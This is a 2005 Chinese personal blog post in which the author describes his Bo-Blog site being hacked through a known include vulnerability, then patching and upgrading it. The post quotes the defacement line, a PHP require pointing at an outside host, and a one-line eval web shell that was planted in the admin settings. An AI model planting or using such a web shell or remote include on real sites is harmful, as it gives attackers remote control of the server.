网络上被黑的事情看着多了去,好像比较出名的LBLOG经常遇到这种问题,还诞生了一个分支 LBS,好像比较注重安全性质。我一向以为那些黑客盗亦有道,而且自己的这个只是一个个人的BLOG,记录一下自己的想法和看法,与世无争,与人无怨。应该不会有什么问题吧。 今天上午刚刚写完MCAFEE和ALEXA工具条BLOG,结果又被抓去调试程序,匆匆看了一下,大约138个注册用户了,下午一直都在调试程序,那台破三星传真机 ,等到快下班的时候仍然是如此,晕头转向的回来一看,BLOG的首页已经被人改了:<?require "http://xhacker.xyii.com");?> 以前看到BOBLOG的公告:Bo-Blog 安全公告及补丁 [06-11] 普通注册用户可以利用程序的一处疏漏,伪装自己为副管理员。但是我一直还没有升级版本,用的是1.7.095,所以也没有在意,这几天一直有意识的访问BO-BLOG,但是今天上午BO-BLOG无法访问。隐约觉得不好,但是也没有办法。 刚开始以为数据丢了,以为自己上午已经做了备份,调试程序头又大,又中午LP电话说儿子感冒,急着回家,于是直接进入后台导入数据,发现仍然不对。 晚上回家,儿子睡的很香,于是静心看看情况,感觉好像只是首页被改了,不是数据丢失,而由于自己的急性子反而丢失了一点数据,WWW.BO-BLOG.COM 可以访问了,Bo-Blog 安全公告及补丁 [06-11] 赶快下载了 补丁包,结果好像还是不行,只好一不做二不休,干脆升级BLOG,再打最新的 patch20050613.rar ,终于又可以访问了,又重新按照自己的情况修改模板。补上BLOG。终于完工。 从http://xhacker.xyii.com 里面看到EMAIL地址QinNi at EvilOctal dot Com,找到 http://www.eviloctal.com/ 又转到http://www.eviloctal.com/weblog/index.php,看到 bo-blog index.php include任意php文件漏洞 由于自己一直都是做应用软件,所以最多是导致程序运行失败,出现非法错误,所以对于这些东西不是很熟悉,看来以后也要了解一些了。 根据他的说明:在后台管理 禁止选项 禁止搜索的词 无意义词 发现 木马 <?php eval($_POST[cmd])?>,自己下载一个 lanker微型PHP后门客户端2.0 试验了一下,的确发现可用,不过BO-BLOG 1000多个文件,不知道还有没有哪里藏着一个? 有位仁兄真有干劲: 来访时间 来访IP 来自 访问页 来路页 http://www.baidu.com/s?lm=0&si=&rn=10&ie=gb2312&ct=0&wd=powered by bo%2Dblog&pn=80&cl=3 他搜索 POWER BY BO-BLOG看来 BOBLOG是不是可以考虑采用图片的形式,我的BLOG已经在搜索结果排到了第九页,他也还是找过来了。 字体:大 中 小 |
 | 永久地址 http://www.shengfang.org/blog/p/bloghack.php |
 | 引用地址 http://www.shengfang.org/blog/tb.php?tb_id=1118844210 |
2005年6月15日22:03星期三 [RAN乱] 
